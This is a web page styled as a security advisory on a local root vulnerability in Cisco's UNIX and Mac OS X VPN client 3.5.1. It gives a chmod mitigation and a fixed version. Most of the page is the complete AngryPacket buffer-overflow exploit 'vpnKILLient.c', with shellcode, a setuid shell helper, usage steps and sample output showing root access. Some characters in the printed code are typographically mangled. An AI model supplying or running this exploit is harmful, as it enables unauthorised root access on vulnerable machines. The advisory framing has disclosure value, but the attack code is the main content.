Cisco VPN UNIX Mac OS X Client Security Issue
About Cisco VPN Client
The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network.
Information
Cisco’s VPN Client for Mac OS X, Linux and Solaris contains a security vulnerability which results in administrative privileges via a exploit. The Virtual Private Network (VPN) client allows for the Non-Windows platform to function over a VPN network. Window’s users need not worry by this particular security advisory.
A local user could exploit the Cisco UNIX VPN client software if installed on the computer by executing arbitrary code granting administrative privileges . If the user has not altered the setuid permissions vpnclient will give administrative privileges allowing the user to modify any part of the system without authorization.
Fix/Update
The vpnclient vulnerability may be mitigated by altering the permission of the binary using the chmod command. In the Terminal window as administrative or root account execute the following command:
/bin/chmod 755 /usr/local/bin/vpnclient
The vulnerability has been fixed in version 3.5.2 which should be made downloadable by Cisco shortly via their website. Go to the Cisco Software distribution center at Cisco’s Web Page to download the new version of the UNIX VPN client.
Exploit/Code for Cisco VPN Client for Linux/Mac OS X
The code from AngryPacket Security – vpnKILLient.c is listed below for example to see how the exploit is executed.
/* buffer overflow for cisco’s vpnclient for linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz
to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)
#include <stdio.h>
main() {
setuid(0);
execl(“/bin/sh”, “sh”, NULL);
}
then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws–x–x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;
when you get a chance, check out http://sec.angrypacket.com
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
#define LEN 620 /* 520 to own eip */
/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
“\x31\xc0\x31\xdb\xb0\x17\xcd\x80”
“\x31\xc0\x50\x68\x2f\x2f\x78\x78”
“\x68\x2f\x74\x6d\x70\x89\xe3\x31”
“\xc0\x50\x89\xe2\x54\x89\xe1\xb0”
“\x0b\xcd\x80\x00”;
unsigned long get_sp (void) {
__asm__(“mov %esp,%eax”);
}
int main(int argc, char *argv[]) {
int i, offset=0;
long addr;
char *buf, *ptr;
if(argc > 1) offset = atoi(argv[1]);
buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() – offset;
printf(“addr: 0x%x, offset: %d\n”, addr, offset);
for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}
for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}
ptr = buf + ((LEN / 2) – (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN – 1] = ‘\0’;
execl(“/usr/local/bin/vpnclient”, “vpnclient”, “connect”, buf, 0);
return(0);
}
More details can be obtained by visiting the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client.